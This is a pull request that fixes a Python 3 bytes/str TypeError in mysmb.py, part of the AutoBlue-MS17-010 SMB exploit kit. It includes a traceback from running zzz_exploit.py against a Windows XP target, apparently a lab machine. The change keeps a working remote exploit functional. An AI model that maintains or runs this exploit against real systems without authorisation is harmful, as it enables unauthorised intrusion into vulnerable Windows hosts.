### PR TITLE
Fix mysmb.py

### DIFF
--- a/mysmb.py
+++ b/mysmb.py
@@ -86,7 +86,7 @@ def _put_trans_data(transCmd, parameters, data, noPad=False):
     if len(data):
         padLen = 0 if noPad else (4 - offset % 4 ) % 4
         transCmd['Parameters']['DataOffset'] = offset + padLen
-        transData += (b'\x00' * padLen) + str.encode(data)
+        transData += (b'\x00' * padLen) + data
 
     transCmd['Data'] = transData
 


### PR DESCRIPTION
Fix `TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object`

### Machine Info

OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
System type:               X86-based PC

### Error output

```bash
┌──(venv-py3.8)─(xxx㉿fsociety)-[/opt/sectools/CVE/AutoBlue-MS17-010]
└─$ python zzz_exploit.py legacy -pipe browser
[*] Target OS: Windows 5.1
[+] Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
Traceback (most recent call last):
  File "zzz_exploit.py", line 1112, in <module>
    main()
  File "zzz_exploit.py", line 1109, in main
    exploit(options.target_ip, int(options.port), username, password, options.pipe, options.share, options.mode)
  File "zzz_exploit.py", line 980, in exploit
    if not info['method'](conn, pipe_name, info):
  File "zzz_exploit.py", line 617, in exploit_fish_barrel
    conn.send_trans_secondary(mid=info['fid'], data=b'\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 315, in send_trans_secondary
    self.send_raw(self.create_trans_secondary_packet(mid, param, paramDisplacement, data, dataDisplacement, pid, tid, noPad))
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 311, in create_trans_secondary_packet
    _put_trans_data(transCmd, param, data, noPad)
  File "/opt/sectools/CVE/AutoBlue-MS17-010/mysmb.py", line 89, in _put_trans_data
    transData += (b'\x00' * padLen) + str.encode(data)
TypeError: descriptor 'encode' for 'str' objects doesn't apply to a 'bytes' object
```